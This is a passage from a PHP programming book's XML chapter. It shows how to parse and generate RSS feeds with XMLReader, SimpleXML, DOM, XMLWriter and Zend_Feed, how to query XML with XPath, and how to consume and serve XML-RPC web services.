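// node read() visits is shown.
$source = '<rss><channel><title>Example</title></channel></rss>';

$xr = new XMLReader();
$xr->XML($source);

$visited = array();
while ($xr->read()) {
    switch ($xr->nodeType) {
        case XMLReader::ELEMENT:
            $visited[] = "element {$xr->localName} at depth {$xr->depth}";
            break;
        case XMLReader::TEXT:
            $visited[] = "text '{$xr->value}' at depth {$xr->depth}";
            break;
        case XMLReader::END_ELEMENT:
            $visited[] = "end of {$xr->localName} at depth {$xr->depth}";
            break;
    }
}
$xr->close();

echo implode("\n", $visited), "\n";
// element rss at depth 0
// element channel at depth 1
// element title at depth 2
// text 'Example' at depth 3
// end of title at depth 2
// end of channel at depth 1
// end of rss at depth 0
```

Notice that the text of an element is a separate node one level deeper than the element itself, which is why the parsing methods call read once more before fetching the value.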

The _getChannelInfo method reads the channel information from the channel
element:

                                                    Rss_XmlReader.class.php (excerpt)

   protected function _getChannelInfo($xr)
   {
     while ($xr->read() && ($xr->depth == 2))
     {
       if (XMLReader::ELEMENT == $xr->nodeType)
       {
         switch ($xr->localName)
         {
           case 'title':
             $xr->read();
             $this->channelTitle = $xr->value;
             break;
           case 'description':
             $xr->read();
             $this->channelDesc = $xr->value;
             break;
           case 'link':
             $xr->read();
             $this->channelLink = $xr->value;
             break;
           case 'item':
             // Items are children of the channel; handle them here so
             // that this loop doesn't read past the first item
             $this->_getItem($xr);
             break;
         }
       }
     }
   }



Parsing the channel information requires that we pluck the appropriate nodes out
of the channel element, including the channel title, description, and link, and
store them in the appropriate object properties.

      Parsing an item is really no different from parsing the channel information—we
      grab one item element at a time. The only difference is that the information is stored
      in the $items array for later iteration:

                                                            Rss_XmlReader.class.php (excerpt)

           protected function _getItem($xr)
           {
             $title = '';
             $link = '';
             $desc = '';
             $date = '';
             while ($xr->read() && ($xr->depth > 2))
             {
               if (XMLReader::ELEMENT == $xr->nodeType)
               {
                 switch ($xr->localName)
                 {
                   case 'title':
                     $xr->read();
                     $title = $xr->value;
                     break;
                   case 'description':
                     $xr->read();
                     $desc = $xr->value;
                     break;
                   case 'link':
                     $xr->read();
                     $link = $xr->value;
                     break;
                   case 'date':
                     $xr->read();
                     $date = $xr->value;
                     break;
                 }
               }
             }
             $this->items[] = array(
               'title' => $title,
               'link' => $link,
               'desc' => $desc,
               'date' => $date
             );
           }
       }

Here is an example of our class in use:

                                                                      xmlreader.php (excerpt)

    <?php
    require_once 'Rss_XmlReader.class.php';

    $rss = new Rss_XmlReader(
        'http://rss.sitepoint.com/f/sitepoint_blogs_feed');
    echo "Title: ", $rss->channelTitle, "\n",
        "Description: ", $rss->channelDesc, "\n",
        "Link: ", $rss->channelLink, "\n";
    foreach ($rss->items as $item)
    {
      echo "Item: {$item['title']}\nLink: "
          . "{$item['link']}\nDescription:\n{$item['desc']}\n";
    }
    ?>



Now that all this work is done, we finally have the equivalent of the simple solution
we presented earlier with SimpleXML. Unfortunately, we’ve also done a lot more
work.

SimpleXML with Zend_Feed
RSS feeds are not the only feeds available, and you might want to access multiple
feed types in a similar fashion. Zend_Feed, a component of the Zend Framework,
offers a unified interface to both RSS and Atom feeds.4 It’s basically a class that
uses SimpleXML, but simplifies the process of retrieving the values by eliminating
the need to cast them to the appropriate type. Here’s an example:

                                                                       zendfeed.php (excerpt)

    require_once 'Zend/Feed/Rss.php';
    $url = 'http://rss.sitepoint.com/f/sitepoint_blogs_feed';
    $channel = new Zend_Feed_Rss($url);
    // Use function syntax to grab properties as values
    echo "Title: ", $channel->title(), "\n",
        "Description: ", $channel->description(), "\n",
        "Link: ", $channel->link(), "\n";
    foreach ($channel as $item)
    {
      echo "Item: ", $item->title(), "\n",
          "Link: ", $item->link(), "\n",
          "Description:\n", $item->description(), "\n";
    }

4
    For Zend_Feed documentation, see http://framework.zend.com/manual/en/zend.feed.html.




      Discussion
      As you can see, using SimpleXML or Zend_Feed is much simpler than creating your
      own parser, as we did when we used XMLReader. The approach that uses Zend_Feed
      doesn’t differ much from that which used SimpleXML; it simply eliminates the
      need to perform type casting. So, why would we bother with XMLReader?

      In the days of PHP 4, the parsing of XML in formats such as RSS feeds was almost
      always done in SAX, if it wasn’t done using simple regular expressions. The DOM
      XML extension was a latecomer on the PHP 4 scene and wasn’t included in the core
      distribution, and thus did not gain much popularity amongst PHP 4 users. In
      addition, most PHP 4 books demonstrated XML parsing using SAX, which led many
      developers to use SAX whenever XML parsing was required.

      Things have changed, however, and we now have a plethora of options for parsing
      XML in PHP 5.

      SAX is still a good option if you’re parsing large documents, as it parses element
      by element, allowing PHP to keep a low memory footprint. However, since it does
      parse element by element, and requires the developer to define callbacks practically
      at a per-element level, it’s rather unintuitive to use, and developers tend to end up
      mired in the details of keeping track of element names and references. If you thought
      the XMLReader example above was difficult to follow, a SAX example would have
      had you completely lost.
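
      To make that comparison concrete, here is a minimal sketch of SAX-style parsing with PHP's ext/xml functions. The inline feed and the variable names are made up for illustration, and the closures assume PHP 5.3 or later. Notice that the three callbacks have to share state flags just to know where they are in the document:

```php
<?php
$xml = '<rss><channel><title>Demo</title>'
     . '<item><title>First</title></item>'
     . '<item><title>Second</title></item></channel></rss>';

$titles  = array();
$inItem  = false;   // state we must track ourselves between callbacks
$inTitle = false;

$parser = xml_parser_create();

// Element names arrive upper-cased because case folding is on by default.
xml_set_element_handler(
    $parser,
    function ($parser, $name, $attrs) use (&$inItem, &$inTitle, &$titles) {
        if ($name === 'ITEM') {
            $inItem = true;
        } elseif ($inItem && $name === 'TITLE') {
            $inTitle  = true;
            $titles[] = '';
        }
    },
    function ($parser, $name) use (&$inItem, &$inTitle) {
        if ($name === 'ITEM') {
            $inItem = false;
        } elseif ($name === 'TITLE') {
            $inTitle = false;
        }
    }
);

// Character data may arrive in several chunks, so we append.
xml_set_character_data_handler(
    $parser,
    function ($parser, $data) use (&$inTitle, &$titles) {
        if ($inTitle) {
            $titles[count($titles) - 1] .= $data;
        }
    }
);

xml_parse($parser, $xml, true);
```

      After the parse, $titles holds only the item titles; the channel title is skipped because $inItem was false when it was encountered.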

      XMLReader combines the low-memory footprint benefits of SAX with some of the
      simplicity of SimpleXML. Like SAX, XMLReader is a streaming parser, which
      means it parses the document incrementally as it reads it. Unlike SAX, which
      pushes events to handlers that you must register, XMLReader is a pull parser:
      your code asks for the next node when it's ready, so it's actually relatively
      simple to parse through a document in a single loop. The main benefit of using
      XMLReader is performance; since XMLReader operates on a stream instead of
      pulling the entire XML document into memory, it can achieve a lot of
      processing with a small memory footprint.
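
The single-loop style described above can be sketched as follows. This is a simplified illustration rather than the Rss_XmlReader class shown earlier; the inline document and variable names are assumptions made for the example:

```php
<?php
$xml = '<rss version="2.0"><channel><title>Demo</title>'
     . '<item><title>First</title></item>'
     . '<item><title>Second</title></item></channel></rss>';

$reader = new XMLReader();
$reader->XML($xml);          // use open() instead to stream from a file or URL

$titles = array();
$inItem = false;

// We ask for one node at a time; nothing is called back into our code.
while ($reader->read()) {
    $isItem = ($reader->name === 'item');
    if ($reader->nodeType === XMLReader::ELEMENT && $isItem) {
        $inItem = true;
    } elseif ($reader->nodeType === XMLReader::END_ELEMENT && $isItem) {
        $inItem = false;
    } elseif ($inItem
        && $reader->nodeType === XMLReader::ELEMENT
        && $reader->name === 'title') {
        $titles[] = $reader->readString();   // text content of <title>
    }
}
$reader->close();
```

Only the current node is held in memory at any point, which is what keeps the footprint small on large feeds.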

DOM functions can also be used to navigate XML.5 This option has one feature that
makes it an excellent choice for many: XPath integration. XPath allows you to search
for nodes within the document by path—an excellent technique for those times
when you want to pull data selectively from an XML document. However, the DOM
functions make it relatively difficult to loop over elements with the ease that
SimpleXML presents; they’re simply overkill for a situation as simple as parsing an RSS
feed. Use DOM when you need to do more complex tasks, such as modifying XML
documents in place.

The best answer to the question of how to parse XML is to use SimpleXML, or a
library wrapping it, such as Zend_Feed. The simplicity of treating an XML document
like a native PHP object cannot be overstated. In addition, it has built-in XPath
support and interoperates with the DOM extension, so at any point you can convert a
SimpleXMLElement to a DOMElement using the dom_import_simplexml function.6
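
As a rough sketch of that hand-off, the snippet below reads a value the SimpleXML way and then switches to DOM for an operation SimpleXML has no direct method for. The inline feed and the comment text are invented for the example:

```php
<?php
$rss = new SimpleXMLElement(
    '<rss version="2.0"><channel><title>Demo feed</title></channel></rss>');

// Read values the SimpleXML way...
$title = (string) $rss->channel->title;

// ...then borrow DOM to insert a comment node before <title>.
$channel = dom_import_simplexml($rss->channel);   // a DOMElement
$comment = $channel->ownerDocument->createComment(' generated by example ');
$channel->insertBefore($comment, $channel->firstChild);

// Both objects refer to the same underlying document, so the change
// shows up when we serialize through SimpleXML.
$xml = $rss->asXML();
```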


How do I generate an RSS feed?
While it’s great to know how to parse RSS feeds, at some point, you’ll undoubtedly
want to generate your own. What XML technologies can you use with PHP 5 to
generate an RSS feed?

Solutions
All these solutions use the following data definition with which to generate the
RSS feed (you can find the complete file in the code archive):

                                                           rsssource.php.inc (excerpt)

    $baseUrl = 'http://example.com/extensions/xml/';
    $extensions = array(
      1 => array(
        'title'       => 'SAX',
        'description' => 'ext/xml provides a SAX XML parser generator',
        'link'        => $baseUrl . 'sax'
      ),
      2 => array(
        'title'       => 'DOM',
        'description' => 'The DOM extension provides an implementation '
                       . 'of DOM, the Document Object Model',
        'link'        => $baseUrl . 'dom'
      ),
      3 => array(
        'title'       => 'XPath',
        'description' => 'XPath is used to query XML documents for '
                       . 'elements',
        'link'        => $baseUrl . 'xpath'
      )
      // ⋮ more array items follow…
    );

5 http://www.php.net/dom/
6 http://www.php.net/dom_import_simplexml/




      Because of its ability to map object properties to XML elements, SimpleXML makes
      it very easy to generate XML documents quickly:

                                                             rss_simplexml.php (excerpt)

       require 'rsssource.php.inc';
       $rss = new SimpleXMLElement(
           '<?xml version="1.0" encoding="UTF-8" ?>' .
           '<rss version="2.0"></rss>');
       $rss->addChild('channel');
       $rss->channel->addChild('title', 'PHP XML Extensions');
       $rss->channel->addChild('description',
           'Information and examples for using the PHP XML extensions');
       $rss->channel->addChild('link',
           'http://example.com/extensions/xml/');
       foreach ($extensions as $extension)
       {
         $item = $rss->channel->addChild('item');
         $item->addChild('title', $extension['title']);
         $item->addChild('description', $extension['description']);
         $item->addChild('link', $extension['link']);
       }
       echo $rss->asXML();



      We previously used SimpleXML to parse XML; in PHP 5.1.3 and versions above, it
      can also be used to generate XML (instead of simply modifying existing XML). It
doesn’t offer the full set of tools that the DOM makes available, but you can always
convert your SimpleXMLElement to a DOMElement using dom_import_simplexml.

As with the task of parsing XML, there’s more than one way to generate XML; other
options include DOM and XMLWriter.

Generating XML Using the DOM
DOM, the Document Object Model, allows you to traverse XML in a tree-like
structure, looking down the tree at child nodes, up the tree at parent nodes, and
horizontally at sibling nodes. Since it supports the entire breadth of XML, the DOM
is an excellent all-around choice for generating XML structures:

                                                               rss_dom.php (excerpt)

 require 'rsssource.php.inc';
 $document = new DOMDocument('1.0', 'UTF-8');
 $rss = $document->createElement('rss');
 $rss->setAttribute('version', '2.0');
 $channel = $document->createElement('channel');
 $title = $document->createElement('title', 'PHP XML Extensions');
 $description = $document->createElement('description',
     'Information and examples for using the PHP XML extensions');
 $link = $document->createElement('link',
     'http://example.com/extensions/xml/');
 $channel->appendChild($title);
 $channel->appendChild($description);
 $channel->appendChild($link);
 foreach ($extensions as $extension)
 {
   $item = $document->createElement('item');
   $title = $document->createElement('title', $extension['title']);
   $description = $document->createElement('description',
       $extension['description']);
   $link = $document->createElement('link', $extension['link']);
   $item->appendChild($title);
   $item->appendChild($description);
   $item->appendChild($link);
   $channel->appendChild($item);
 }
 $rss->appendChild($channel);
 $document->appendChild($rss);
 echo $document->saveXML();

      Generating XML Using XMLWriter
      XMLWriter is a cousin to XMLReader. It allows you to write XML documents
      iteratively, element by element, and to write either in memory or directly to a URI.7
      The XMLWriter interface can be accessed using either OOP or procedural function
      calls:

                                                                               rss_xmlwriter.php (excerpt)

          require 'rsssource.php.inc';
          $xw = new XMLWriter();
          $xw->openMemory(); // use openUri() to output directly to a file
          $xw->startDocument('1.0', 'UTF-8');
          $xw->startElement('rss');
          $xw->writeAttribute('version', '2.0'); // as in the other examples
          $xw->startElement('channel');
          $xw->writeElement('title', 'PHP XML Extensions');
          $xw->writeElement('description',
              'Information and examples for using the PHP XML extensions');
          $xw->writeElement('link', 'http://example.com/extensions/xml/');
          foreach ($extensions as $extension)
          {
            $xw->startElement('item');
            $xw->writeElement('title', $extension['title']);
            $xw->writeElement('description', $extension['description']);
            $xw->writeElement('link', $extension['link']);
            $xw->endElement(); // item
          }
          $xw->endElement(); // channel
          $xw->endElement(); // rss
          $xml = $xw->outputMemory(true);
          echo $xml;

      7 For an in-depth explanation of XMLWriter, check out php|architect’s May 2006 issue, which has
      an article entitled "XMLWriter," by Rob Richards, author of the extension.

      Discussion
      While probably the easiest solutions for generating XML are simply to concatenate
      strings or to use a templating system, both have a significant drawback: they make
      it very easy to mix character encodings accidentally or to introduce extraneous tags
      or unescaped reserved XML characters, and thus end up with malformed XML. The
      better solution is to use one of the DOM, SimpleXML, or XMLWriter extensions,
      which take care of those problems automatically.
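
The difference is easy to demonstrate. In this small sketch (the title string is invented for the example), the concatenated version fails to parse, while the XMLWriter version round-trips cleanly:

```php
<?php
$title = 'Tips & Tricks <for PHP>';

// Naive concatenation: the & and < end up unescaped in the markup.
$naive = '<title>' . $title . '</title>';

// XMLWriter escapes reserved characters for us.
$xw = new XMLWriter();
$xw->openMemory();
$xw->writeElement('title', $title);
$safe = $xw->outputMemory();

libxml_use_internal_errors(true);   // collect parse errors quietly
$naiveParsed = simplexml_load_string($naive);   // false: not well formed
$safeParsed  = simplexml_load_string($safe);    // a SimpleXMLElement
```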

XMLWriter is a relatively new extension that can be very useful if you’re generating
XML content sequentially. It’s a great choice if you have a fairly flat tree structure,
as this approach is almost as easy as concatenating strings or using a template system,
yet it protects you against encoding issues and improperly formed XML. XMLWriter
is also a great choice if you’re creating large documents, as it has the ability to write
documents directly to disk instead of keeping them in memory. This approach helps
prevent the kinds of memory issues found in the more heavyweight extensions,
such as DOM and SimpleXML, that operate entirely in memory. On the downside,
you have to close your own elements and keep track of where you are in the tree in
order to use this functionality. Your best bet is to use code indentation and comments
to keep track of where you are in the tree.
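
Here is a hedged sketch of the write-to-disk approach. The temporary file location, the item count, and the flush interval are arbitrary choices for the example, not recommendations:

```php
<?php
$path = tempnam(sys_get_temp_dir(), 'rss');   // hypothetical output location

$xw = new XMLWriter();
$xw->openUri($path);
$xw->startDocument('1.0', 'UTF-8');
$xw->startElement('rss');
$xw->writeAttribute('version', '2.0');
$xw->startElement('channel');
for ($i = 1; $i <= 1000; $i++) {
    $xw->startElement('item');
    $xw->writeElement('title', 'Item ' . $i);
    $xw->endElement(); // item
    if ($i % 100 === 0) {
        $xw->flush();  // push buffered output to disk
    }
}
$xw->endElement(); // channel
$xw->endElement(); // rss
$xw->endDocument();
$xw->flush();
unset($xw);            // release the writer before reading the file back

$itemCount = count(simplexml_load_file($path)->channel->item);
unlink($path);
```

The indentation-style comments on each endElement() call are the bookkeeping mentioned above: they are the only record of which element is being closed.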

DOM allows you to build your documents from the inside out, and vice versa.
However, you’ll quickly become bogged down trying to remember which node
you’re in and whether or not it has children or a parent, because you need to operate
on individual DOMElements. There’s no easy way to view the overall tree structure
from your code. As a result, it’s probably best to use the DOM when you need to
modify existing XML.

As we’ve seen in these examples, SimpleXML allows you to build XML documents
as well as read them. Its object mapping of XML makes it very easy to create visual
trees in your code, and its ties to the DOM mean that once you’ve created the
structure, you can easily manipulate the document using DOM to set the encoding
and namespaces as necessary. The combination of SimpleXML and DOM should
become the Swiss Army Knife of your XML toolbox in PHP 5.


How do I search for a node or content in XML?
Often, you only need a few pieces of information from a particular XML document.
Should you parse the entire document to find those elements? What if, for example,
all you need is a set of siblings that share a given element name?


      Solution
      The solution is easy: use XPath. XPath, the XML Path Language, allows you to
      search the logical structure of a document using a URL-like path notation. It was
      originally developed to aid in XSL transformations, but has many other uses. The
      DOM extension has built-in support for XPath; so does SimpleXML. Here’s an
      example that uses the DOM extension:

                                                                 xpath_dom.php (excerpt)

       $doc = new DOMDocument;
       $doc->preserveWhiteSpace = false;
       $doc->load('http://rss.sitepoint.com/f/sitepoint_blogs_feed');
       $xpath = new DOMXPath($doc);

       $titles = $xpath->query('//item/title');
       foreach ($titles as $title)
       {
           echo $title->nodeValue, "\n";
       }



      This example loads the SitePoint blog feed and uses the XPath query //item/title
      to select the title elements from all the item elements.

      Here's a similar solution using SimpleXML:

                                                            xpath_simplexml.php (excerpt)

       $doc = new SimpleXMLElement(
           'http://rss.sitepoint.com/f/sitepoint_blogs_feed',
           null,
           true    // tell SimpleXML that we're supplying a URL
       );
       // search for titles with an item parent
       foreach ($doc->xpath('//item/title') as $title)
       {
           echo $title, "\n";
       }


Discussion
XPath could easily be the subject of an entire chapter, or even a book. The following
discussion serves only as the briefest of introductions; for full documentation on
the subject, check out the XPath specification at the W3C.8 9

XPath operates under a number of rules, the most basic of which is that the forward
slash, /, is used as a path separator between different levels in the XML tree
hierarchy. In the examples above, we were looking only for title nodes that were children
of item elements: item/title. To tell XPath that these elements may appear at any
depth in the document, rather than directly beneath the root node, we prefix the
path with a double slash, //. The same data could have been queried using a full
path to the elements, /rss/channel/item/title.

The most basic rules for using XPath are:

■	 A forward slash, /, is a path separator.
■	 An absolute path from the root starts with a single forward slash, /.
■	 A relative path from a given location can start with anything else.
■	 A path matching elements at any depth of the document starts with two
   forward slashes, //.
■	 A double period, .., indicates the parent of a node.
■	 A single period, ., indicates the current node.
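
The rules above can be tried out on a small inline document. This is only a sketch; the feed content is invented for the example:

```php
<?php
$doc = new SimpleXMLElement(
    '<rss version="2.0"><channel><title>Feed</title>'
    . '<item><title>One</title></item>'
    . '<item><title>Two</title></item></channel></rss>');

$absolute = $doc->xpath('/rss/channel/item/title'); // full path from the root
$anyDepth = $doc->xpath('//item/title');            // item/title at any depth
$relative = $doc->channel->xpath('item/title');     // relative to <channel>
$parents  = $doc->xpath('//item/title/..');         // back up to each <item>

$parentNames = array();
foreach ($parents as $node) {
    $parentNames[] = $node->getName();
}
```

All of the first three queries select the same two item titles; the channel's own title is never matched because it isn't the child of an item.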

XPath also allows you to match against element attributes, specific items within a
set of results, and even element values:

■	 Match values using [NODE=""], where NODE is a node name or indicator (such
   as . or ..) and the value to match goes between the quotes.
■	 Match attributes using @ATTR, either as part of the path expression, or as a
   modifier to the node (for example item/@type, item[@type], item[@type='']).
■	 Match an element by its position among its siblings using brackets (for example,
   //item/title[2] selects the second title child of any item); note that indices
   start at 1. To index into the whole result set instead, wrap the path in
   parentheses: (//item/title)[2].
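
A short sketch of these predicates in action follows. The document, including the type attribute and the second title in one item, is contrived purely to make each query return something distinct:

```php
<?php
$doc = new SimpleXMLElement(
    '<rss version="2.0"><channel>'
    . '<item type="news"><title>Alpha</title></item>'
    . '<item type="blog"><title>Beta</title><title>Beta (alt)</title></item>'
    . '</channel></rss>');

$byValue    = $doc->xpath('//item[title="Alpha"]');       // match on a child's value
$byAttr     = $doc->xpath('//item[@type="blog"]/title');  // match on an attribute
$attrValues = $doc->xpath('//item/@type');                // select the attributes
$second     = $doc->xpath('//item/title[2]');     // 2nd title within its item
$secondAll  = $doc->xpath('(//item/title)[2]');   // 2nd title in the whole result
```

The last two queries show why the position predicate deserves care: the first returns "Beta (alt)", the second returns "Beta".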




8 http://www.w3.org/TR/xpath/
9 Sun also has an excellent XPath tutorial available at
http://java.sun.com/j2ee/1.4/docs/tutorial/doc/JAXPXSLT3.html.

      As an example, on the day I write this, the SitePoint Blogs RSS feed presents an
      item with the title, “News Wire: Liquid vs. Fixed.” To grab this item element, I can
      use the following code:

       // assuming $doc is a SimpleXMLElement
       $item = $doc->xpath(
           '//item/title[.="News Wire: Liquid vs. Fixed"]/..');



      Those lines return to me the item node and its children by matching:

      ■	 all item elements (//item)
      ■	 that have a title element (/title)
      ■	 with a value of “News Wire: Liquid vs. Fixed” ([.="News Wire: Liquid vs.
         Fixed"])
      ■	 and return the parent item element (/..)

      Several wildcards are also allowed:

      ■	 * matches any element node (not a text or attribute node).
      ■	 node() matches any type of node.
      ■	 @* matches any attribute.
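
      To see how the three wildcards differ, here is a small sketch using DOMXPath, which can return comment and text nodes as well as elements. The document is invented for the example and is written on one line so that no whitespace text nodes are involved:

```php
<?php
$dom = new DOMDocument();
$dom->loadXML(
    '<channel><item id="7" lang="en"><title>One</title>'
    . '<!-- note --><link>http://example.com/1</link></item></channel>');
$xpath = new DOMXPath($dom);

$elements = $xpath->query('/channel/item/*');       // title, link
$nodes    = $xpath->query('/channel/item/node()');  // title, comment, link
$attrs    = $xpath->query('/channel/item/@*');      // id, lang
```

      The comment is picked up by node() but not by *, which only ever matches elements.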

      XPath has much more to offer, including operators and a set of functions for
      matching and manipulating strings in the path. If you find yourself needing to search
      your XML documents, XPath is a good skillset to have at your disposal.


      How can I consume XML-RPC web services?
      XML-RPC is an XML-based protocol for performing remote procedure calls: basically,
      the process of calling functions and methods on a remote machine. The XML-RPC
      specification defines a simple structure for calling a method on a server with
      zero or more parameters of given types; a single value is returned, just like a PHP
      function.10 For more information on XML-RPC, visit the official XML-RPC web
      site.11




      10 http://www.xmlrpc.com/spec/
      11 http://www.xmlrpc.com/

XML-RPC also uses the concept of namespaces. Namespaces allow a single server
to serve several groups of related methods in a way that ensures that method name
collisions do not occur. A prototype XML-RPC method call might look like this:

 struct lookup.state(string)



This call indicates that the state method of the lookup namespace expects a string
as an argument, and returns a struct (associative array) as a response. An actual call,
using Zend Framework’s Zend_XmlRpc_Client, might look like this:

 $info = $client->lookup->state('Vermont');



XML-RPC is the grand-daddy of web services, and its simplicity is appealing to
many developers; with the clients available in most languages, we simply pass in
native values, and receive a native value as a response.

So, now you know about XML-RPC; how can you consume an XML-RPC service?

Solution
The Zend Framework offers an XML-RPC implementation that includes both a client
and server. Its interface is entirely object oriented, making it a good choice for OOP
enthusiasts; in particular, the ability to chain namespaces leading to a method makes
it incredibly intuitive to use. As an example, here’s a simple XML-RPC client script
that uses the XML-RPC server in “How do I serve my own XML-RPC web services?”.
The server exposes a math namespace with two methods, add and multiply:

                                                        zend_xmlrpc_client.php (excerpt)

 require_once 'Zend/XmlRpc/Client.php';
 try
 {
   $client = new Zend_XmlRpc_Client(
       'http://localhost/phpant2/chapter_12/examples/' .
       'zend_xmlrpc_serv.php');
   $proxy = $client->getProxy();
   $add = $proxy->math->add(array(1,2));
   $mult = $proxy->math->multiply(array(21343243346,989554365486));
   echo '1 + 2 = ' . $add . "<br />";
   echo '21343243346 * 989554365486 = ' . $mult;
 }
 catch (Zend_XmlRpc_Client_FaultException $e)
 {
   echo $e->getMessage();
 }




      We first instantiate the Zend_XmlRpc_Client object with the URL of the web service.
      The URL I've used above is relevant only to our testing environment, so be sure to
      change it to an appropriate alternative if you’re testing this script. The
      Zend_XmlRpc_Client then allows us to call the web service directly as if it were a
      PHP method, for example, $proxy->math->add.

      It’s really that easy; the Zend_XmlRpc_Client and its namespace proxy make calling
      XML-RPC methods as simple as calling object methods.12 We pass native PHP values
      as method arguments, and get PHP values back. What could be easier?

      PHP’s Native XML-RPC Extension
      If you don’t want to install Zend Framework, what other options do you have?

      PHP has a native XML-RPC extension, ext/xmlrpc, that can either be compiled
      using the --with-xmlrpc configure option, or installed via PECL. It’s marked as
      experimental, so using it in a production environment may be risky, though it has
      been available since the early PHP 4 series. It provides functions for encoding
      and decoding XML-RPC values, creating XML-RPC requests and responses, and binding
      an XML-RPC server to PHP callbacks.

      A basic request uses the xmlrpc_encode_request function:

       $request = xmlrpc_encode_request($methodName, $valuesArray); 



      Here, $methodName is the XML-RPC method being requested, and $valuesArray is
      an array of values that are to be passed as arguments to the request. If you need to
      specify an XML encoding, you can pass an optional third value, an associative
      array, with some options:

 $request = xmlrpc_encode_request(
     $methodName,
     $valuesArray,
     array('encoding' => 'UTF-8')
 );

      12 http://framework.zend.com/manual/en/zend.xmlrpc.html



The returned $request is the XML that we can use to make the request.
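
For orientation, the payload for a call such as math.add with a single array argument looks roughly like the document built below. This sketch assembles it by hand with XMLWriter purely to show the structure defined by the XML-RPC specification; it is not how ext/xmlrpc works internally, and the exact whitespace and type tags that xmlrpc_encode_request emits may differ:

```php
<?php
$xw = new XMLWriter();
$xw->openMemory();
$xw->startDocument('1.0', 'UTF-8');
$xw->startElement('methodCall');
$xw->writeElement('methodName', 'math.add');
$xw->startElement('params');
$xw->startElement('param');          // one positional parameter...
$xw->startElement('value');
$xw->startElement('array');          // ...which is itself an array
$xw->startElement('data');
foreach (array(1, 2) as $number) {
    $xw->startElement('value');
    $xw->writeElement('int', (string) $number);
    $xw->endElement(); // value
}
$xw->endElement(); // data
$xw->endElement(); // array
$xw->endElement(); // value
$xw->endElement(); // param
$xw->endElement(); // params
$xw->endElement(); // methodCall
$request = $xw->outputMemory();

// Parse it back to confirm the structure.
$parsed = simplexml_load_string($request);
```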

Note that some XML-RPC types don’t have direct equivalents in PHP; to use these,
you’ll need to tell ext/xmlrpc how they should be encoded using the
xmlrpc_set_type function. This function takes its value by reference, converts it
in place, and returns a Boolean indicating success, so it must be given a variable
rather than a literal. The converted values can then be passed directly to the
xmlrpc_encode_request function:

 $date = '20061201T00:00:00'; // ISO 8601 date and time
 xmlrpc_set_type($date, 'datetime');
 $base64 = $base64EncodedData;
 xmlrpc_set_type($base64, 'base64');
 $request = xmlrpc_encode_request(
   $methodName,
   array($date, $base64, $assocArray),
   array('encoding' => 'UTF-8')
 );



As an example, here’s a simple XML-RPC client script that uses ext/xmlrpc and
the XML-RPC server we saw in “How do I serve my own XML-RPC web services?”:

                                                    ext_xmlrpc_client.php (excerpt)

 try
 {
   $request = xmlrpc_encode_request(
     'math.add',
     array(array(1,2)),
     array('encoding' => 'UTF-8')
   );

   $context = stream_context_create(array('http' => array(
       'method' => "POST",
       'header' => "Content-Type: text/xml",
       'content' => $request
   )));
   $file = file_get_contents(
       'http://localhost/phpant2/chapter_12/examples/' .
       'zend_xmlrpc_serv.php', false, $context);
   // file_get_contents returns false on failure
   if ($file === false) {
     throw new Exception('Unable to get response from web service');
   }
   $response = xmlrpc_decode($file);
   if (is_array($response) && xmlrpc_is_fault($response))
   {
     throw new Exception($response['faultString'],
         $response['faultCode']);
   }
   echo '1 + 2 = ' . $response;
 }
 catch (Exception $e)
 {
   echo $e->getMessage();
 }




      PHP’s ext/xmlrpc extension does most of the work to abstract the basic XML-RPC
      functionality of encoding and decoding values and requests and responses. However,
      you have to create the actual data exchange transfer yourself, as we did above with
      the file_get_contents function. This approach offers nothing near the simplicity
      of Zend_XmlRpc_Client unless, for example, you write your own class wrapper
      around it.


      How do I serve my own XML-RPC web services?
      XML-RPC servers listen at a specified address for HTTP POST requests, and return
      XML in the response content using the text/xml Content-Type header. Errors are
      reported using an XML-RPC fault response, which is an XML struct response that
      contains faultCode and faultString elements.
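
      To give a feel for the format, here is a sketch that pulls the two fault members out of a response using SimpleXML. The response body is a hand-written illustration following the layout in the XML-RPC specification, and the $fault array is just a convenient structure for the example:

```php
<?php
$responseXml = <<<XML
<methodResponse>
  <fault>
    <value>
      <struct>
        <member>
          <name>faultCode</name>
          <value><int>4</int></value>
        </member>
        <member>
          <name>faultString</name>
          <value><string>Too many parameters.</string></value>
        </member>
      </struct>
    </value>
  </fault>
</methodResponse>
XML;

$response = new SimpleXMLElement($responseXml);
$fault    = array();
$members  = $response->xpath('/methodResponse/fault/value/struct/member');
foreach ($members as $member) {
    // Each member has a name and a typed value element (int, string, ...).
    $typed = $member->xpath('value/*');
    $fault[(string) $member->name] = (string) $typed[0];
}
$isFault = isset($fault['faultCode'], $fault['faultString']);
```

      Values extracted this way are strings; a real client library would convert them to native types based on the type element.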

      Let’s see what’s involved in the process of decoding incoming requests, dispatching
      them, and returning a valid response.

      Solution
      The Zend_XmlRpc_Server class allows you to bind classes or functions to the server
      with optional namespaces;13 it then uses the Reflection API, and the
      developer-created phpDocumentor docblocks describing the functions or class
      methods,14 to determine the XML-RPC prototypes. The caveat to using this approach
      is that you must use XML-RPC types in your docblocks to describe your parameters
      and return values.

      13 http://framework.zend.com/manual/en/zend.xmlrpc.html

Zend_XmlRpc_Server, like all server classes in the Zend Framework, follows PHP’s
SoapServer API, which makes the interface consistent across the different protocol
implementations.

As an example, here’s a simple Math class with two methods, add and multiply,
for which we can build a server:

                                                            Math.class.php (excerpt)

 /**
   * Math methods
   */
 class Math
 {
      /**
       * Return the sum of all values in an array
       *
       * @param array $values An array of values to sum
       * @return int
       */
      public static function add($values)
      {
          return array_sum($values);
      }
      /**
       * Return the product of all values in an array
       *
       * @param array $values An array of values to multiply
       * @return int
       */
      public static function multiply($values)
      {
          return array_product($values);
      }
 }




14 http://www.phpdoc.org/

      Now, let’s build the XML-RPC server, and for good measure, let’s also create a
      function for retrieving XML-RPC server information:

                                                              zend_xmlrpc_serv.php (excerpt)

       require_once 'Zend/XmlRpc/Server.php';
       require_once 'Math.class.php';

       /**
         * Get some info from the server
         *
        * @return struct
         */
       function getInfo()
       {
          return array(
              'publisher' => 'SitePoint',
              'title' => 'The PHP Anthology'
          );
       }

       $server = new Zend_XmlRpc_Server();
       // Math class methods will be available in the 'math' namespace
       $server->setClass('Math', 'math');
       // getInfo() function will be available as server.getInfo
       $server->addFunction('getInfo', 'server');
       // Handle a request
       echo $server->handle();



      The Zend_XmlRpc_Server instance in this example will make three methods
      available, math.add, math.multiply, and server.getInfo, in addition to several system
      methods that we can use to obtain information about the server. It will automatically
      check incoming requests to make sure they adhere to the various method signatures,
      throwing fault responses if they do not, and return the XML-RPC response along
      with any required headers. You don’t need to change your code to conform to the
      server class requirements; the server conforms to your code.

      You will need to write phpDocumentor docblocks for each method or function you’ll
      be serving, and ensure they contain @param and @return tags; the server uses these
